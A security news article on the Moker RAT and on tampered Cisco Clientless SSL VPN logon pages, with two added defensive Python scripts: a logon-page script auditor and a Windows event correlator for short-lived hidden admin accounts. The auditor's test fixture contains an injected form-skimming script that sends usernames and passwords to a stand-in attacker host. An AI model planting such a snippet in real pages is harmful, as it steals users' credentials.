Virtual private network (VPN) connections can provide a false sense of security, and two separate, newly discovered attack campaigns that abuse the much-vaunted corporate channel serve as a wake-up call for how attackers can turn VPNs to their own ends.
In one of the two campaigns, enSilo researchers spotted a cyber espionage attack using a remote access Trojan (RAT) that, among other things, allows an attacker to log into a machine it infects using the user's legitimate credentials. The so-called Moker RAT disables and sneaks past antivirus, sandboxes, and virtual machine-based tools, as well as Microsoft Windows' User Account Control (UAC) feature.
Moker, which attaches itself to the Windows operating system and poses as a legitimate OS process, can be used by the attacker to operate "locally," according to enSilo. "Consider a scenario where the attacker logs on to the infected machine using the VPN credentials of a legitimate user. In that case, the attacker connects to the machine from remote – but locally controls Moker," says Yotam Gottesman, a senior security researcher at enSilo. "The attacker can then perform all the cyber espionage activities one imagines a RAT doing, such as keylogging, taking screenshots, monitoring Web traffic – and even altering it."
In the Cisco VPN attacks detailed by Volexity, one method exploits a known and patched authentication-check vulnerability in the Cisco Clientless SSL VPN portal, CVE-2014-3393. In February, Cisco issued a notice warning of public exploits for the flaw, and a Metasploit module for the attack is also available. "While Cisco provided updated software to address the vulnerability, attackers were already off to the races. Vulnerable organizations that were slow to update may have received an unwelcome addition to the source of their logon.html file," Volexity researchers wrote in a blog post today.
The weakness in Cisco's Web-based VPN isn't unique to Cisco, however, according to Volexity. "Attackers are continuing to find new ways to use and abuse systems for long term persistent access to networks and systems of interest. This problem is not remotely unique to Cisco Web VPNs. Any other VPN, web server, or appliance that an attacker can gain administrative access to or otherwise customize/modify will potentially present similar risks," Volexity says.
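The practical check that follows from Volexity's warning is to compare the logon page an appliance actually serves against a known-good copy and flag anything that was added, especially script tags. The script below is an added example, not code from Volexity, Cisco or this article: the baseline and tampered logon.html samples are constructed, the `cdn-example.invalid` host is hypothetical, and the assumption that the "unwelcome addition" takes the form of injected script tags is the author's, not something the article states.

```python
"""Audit a Clientless SSL VPN logon page (or any appliance-served login page)
for additions relative to a known-good baseline copy.

Added example, not Volexity's or Cisco's code. Both HTML samples are
constructed; the attacker host name is hypothetical."""
import hashlib
import re
from html.parser import HTMLParser

# Constructed known-good logon.html, as captured before any tampering.
BASELINE_HTML = """<html><head><title>SSL VPN Service</title>
<script src="/+CSCOE+/logon_forms.js"></script>
<script>function csco_init(){document.forms[0].username.focus();}</script>
</head><body onload="csco_init()">
<form method="post" action="/+webvpn+/index.html">
<input name="username"><input name="password" type="password">
</form></body></html>"""

# Constructed tampered copy: the original content is intact, but an inline
# credential-stealing script and an external script hosted on a hypothetical
# attacker domain were appended to the page source.
TAMPERED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<script>document.forms[0].onsubmit=function(){'
    'new Image().src="https://cdn-example.invalid/c?u="+'
    'this.username.value+"&p="+this.password.value;};</script>'
    '<script src="https://cdn-example.invalid/j.js"></script></body>')


class ScriptCollector(HTMLParser):
    """Collect external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute values
        self.inline = []        # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def script_inventory(html):
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.external, p.inline


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def audit_logon_page(html, baseline_html, allowed_hosts=("",)):
    """Return (kind, detail) findings: scripts in `html` that are absent from
    the baseline, plus external scripts whose host is not allowed. Relative
    src values have an empty host and are allowed by default."""
    base_ext, base_inline = script_inventory(baseline_html)
    base_inline_hashes = {sha256(s) for s in base_inline}
    ext, inline = script_inventory(html)
    findings = []
    if sha256(html) == sha256(baseline_html):
        return findings     # byte-identical to the baseline; nothing to report
    for src in ext:
        host = re.sub(r"^[a-z]+://", "", src, flags=re.I).split("/")[0]
        if src not in base_ext:
            findings.append(("new-external-script", src))
        if host.lower() not in allowed_hosts:
            findings.append(("external-script-offsite", src))
    for body in inline:
        if sha256(body) not in base_inline_hashes:
            findings.append(("new-inline-script", body[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_logon_page(TAMPERED_HTML, BASELINE_HTML):
        print(kind, detail)
```

In production the baseline would be the page fetched right after a clean install or upgrade and stored off the appliance, since an attacker with administrative access to the device can alter whatever copy lives on it.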
enSilo first found Moker on a customer's machine in a "sensitive" network environment. Gottesman says his team thus far isn't sure who's behind the attacks or where they are located, but it's likely an attacker with advanced skill and resources. Among its capabilities are creating a new user account and opening a Remote Desktop Protocol (RDP) channel for remote control of the endpoint; taking screenshots, monitoring keystrokes, and stealing files; and replacing legitimate code with malware in system processes.
"What made this an interesting APT is that it gave us a deep look into the malware: from the ways it defeats security measures, such as using 2-step installation and exploiting various Windows vulnerabilities, to trying to deceive security researchers once detected," Gottesman says. "It’s obvious that the malware’s authors invested heavily in this malware."
When Moker creates a new user with the stolen admin privileges, the victim sees no prompt because the malware has already bypassed UAC. The attacker then further covers his tracks: "The new administrator user never visually appears on the login screen. During cleanup, this user is also deleted from the system," he says. "Apart from trying to remain stealthy, it looks like the threat actors were also looking at extending the malware’s longevity by placing many anti-research capabilities."
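The account lifecycle Gottesman describes (a local administrator that is created, used over RDP, and then deleted) leaves a trail in the Windows Security log even when the account never shows on the login screen. The correlation below is an added example, not enSilo's tooling or anything the article attributes to them: the event records are constructed, simplified dicts rather than parsed EVTX, the account and SID values are made up, and the scoring threshold is the author's choice. The event IDs and field names themselves (4720 account created, 4732 member added to a local group, 4624 logon with LogonType 10 for RDP, 4726 account deleted) are standard Windows values.

```python
"""Correlate Windows Security events for a short-lived hidden administrator:
an account that is created, added to Administrators, used for an RDP
(RemoteInteractive) logon, and then deleted within a bounded window.

Added example, not enSilo's code. EVENTS is constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

# Windows Security event IDs and well-known values (documented, not assumed).
USER_CREATED = 4720
ADDED_TO_LOCAL_GROUP = 4732
LOGON = 4624
USER_DELETED = 4726
RDP_LOGON_TYPE = "10"            # RemoteInteractive
ADMINS_SID = "S-1-5-32-544"      # BUILTIN\Administrators

# Which field carries the SID of the account each event is about.
ACCOUNT_SID_FIELD = {USER_CREATED: "TargetSid", USER_DELETED: "TargetSid",
                     ADDED_TO_LOCAL_GROUP: "MemberSid", LOGON: "TargetUserSid"}

# Constructed sample events; the domain SID prefix and names are made up.
_SID = "S-1-5-21-1111111111-2222222222-3333333333-"
EVENTS = [
    {"ts": "2015-10-06T21:14:02", "id": 4720, "TargetUserName": "svc_upd",
     "TargetSid": _SID + "1005", "SubjectUserName": "jsmith"},
    # In 4732 TargetSid is the *group*; the new member is in MemberSid.
    {"ts": "2015-10-06T21:14:03", "id": 4732, "MemberSid": _SID + "1005",
     "TargetSid": ADMINS_SID, "TargetUserName": "Administrators",
     "SubjectUserName": "jsmith"},
    {"ts": "2015-10-06T21:14:40", "id": 4624, "TargetUserName": "svc_upd",
     "TargetUserSid": _SID + "1005", "LogonType": "10",
     "IpAddress": "10.8.0.23"},
    {"ts": "2015-10-06T23:02:11", "id": 4726, "TargetUserName": "svc_upd",
     "TargetSid": _SID + "1005", "SubjectUserName": "jsmith"},
    # Benign helpdesk activity: account created, console logon, never deleted.
    {"ts": "2015-10-06T09:30:00", "id": 4720, "TargetUserName": "newhire",
     "TargetSid": _SID + "1006", "SubjectUserName": "helpdesk"},
    {"ts": "2015-10-06T09:31:00", "id": 4624, "TargetUserName": "newhire",
     "TargetUserSid": _SID + "1006", "LogonType": "2", "IpAddress": "-"},
]


def _t(ev):
    return datetime.fromisoformat(ev["ts"])


def account_timelines(events):
    """Group events by the SID of the account they concern and return, per
    SID, a time-sorted list of (timestamp, event id, event) tuples."""
    by_sid = defaultdict(list)
    for ev in events:
        field = ACCOUNT_SID_FIELD.get(ev["id"])
        sid = ev.get(field) if field else None
        if sid:
            by_sid[sid].append((_t(ev), ev["id"], ev))
    for sid in by_sid:
        by_sid[sid].sort(key=lambda x: x[0])
    return by_sid


def find_ephemeral_admins(events, max_lifetime=timedelta(hours=24)):
    """Return one alert per account that was created and deleted within
    `max_lifetime` and, in between, was granted local admin and/or logged on
    over RDP. Deletion is required; admin and RDP each add to the score so a
    missing stage lowers confidence rather than hiding the account."""
    alerts = []
    for sid, timeline in account_timelines(events).items():
        created = [t for t, i, _ in timeline if i == USER_CREATED]
        deleted = [t for t, i, _ in timeline if i == USER_DELETED]
        if not created or not deleted:
            continue    # pre-existing or still-present accounts are out of scope
        if deleted[-1] - created[0] > max_lifetime:
            continue
        admin = any(i == ADDED_TO_LOCAL_GROUP and e.get("TargetSid") == ADMINS_SID
                    for _, i, e in timeline)
        rdp = any(i == LOGON and e.get("LogonType") == RDP_LOGON_TYPE
                  for _, i, e in timeline)
        names = {e.get("TargetUserName") for _, i, e in timeline
                 if i in (USER_CREATED, USER_DELETED, LOGON)}
        alerts.append({"sid": sid, "account": ", ".join(sorted(n for n in names if n)),
                       "created": created[0].isoformat(),
                       "deleted": deleted[-1].isoformat(),
                       "admin": admin, "rdp": rdp, "score": 1 + admin + rdp})
    return alerts


if __name__ == "__main__":
    for alert in find_ephemeral_admins(EVENTS):
        print(alert)
```

Correlating on the account SID rather than the name matters here: 4732 records the new member only as a SID, and an attacker who cleans up and re-creates an account with the same name gets a fresh SID, so a name-keyed join would merge or miss events.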